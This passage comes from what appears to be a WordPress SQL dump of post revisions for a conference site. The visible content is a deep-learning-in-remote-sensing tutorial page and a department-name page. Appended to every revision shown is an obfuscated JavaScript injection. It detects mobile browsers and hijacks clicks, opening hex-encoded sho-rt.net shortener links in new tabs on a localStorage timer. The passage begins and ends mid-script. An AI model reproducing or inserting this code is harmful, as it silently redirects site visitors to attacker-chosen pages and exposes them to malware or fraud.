_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Deep Learning in Remote Sensing: Algorithms and Applications','','inherit','closed','closed','','3709-revision-v1','','','2023-02-02 09:57:02','2023-02-02 09:57:02','',3709,'https://gsw2023.com/?p=3713',0,'revision','',0),
(3714,1,'2023-02-02 09:59:22','2023-02-02 09:59:22','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3710\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Henry Leung</h6>\n<h6>Professor, Electrical and Software Engineering</h6>\n<h6>University of Calgary, Canada</h6>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"72\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5></h5>\n<h5 style=\"text-align: justify;\"><strong>Deep learning algorithms have been widely used in remote sensing because of their effectiveness in image processing and computer vision. In this tutorial, we will present a review of selected deep learning algorithms that are popular in the remote sensing community including convolutional neural networks (CNN), generative adversarial networks (GAN), transformers, transfer learning, and meta learning. In the second half of the tutorial, we will present our research works on these deep learning algorithms in different remote sensing applications: 1) Synthetic aperture radar (SAR) target recognition based on cross-domain and cross-task transfer learning, 2) image generation using GAN and its application to SAR targe recognition, 3) image fusion based on transformers and GAN, 4) satellite image segmentation for different types of satellite images using deep neural networks such as deeplabs and efficient nets, 5) target recognition using meta-learning with shared and specific structures for SAR, and 6) style transfer using GAN to transform remote sensing images among different domains such as SAR and optical images.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Deep Learning in Remote Sensing: Algorithms and Applications','','inherit','closed','closed','','3709-revision-v1','','','2023-02-02 09:59:22','2023-02-02 09:59:22','',3709,'https://gsw2023.com/?p=3714',0,'revision','',0),
(3715,1,'2023-02-02 10:03:34','2023-02-02 10:03:34','<!-- wp:paragraph -->\n<p>Department of Electrical and Computer Engineering of the University of Calgary</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return 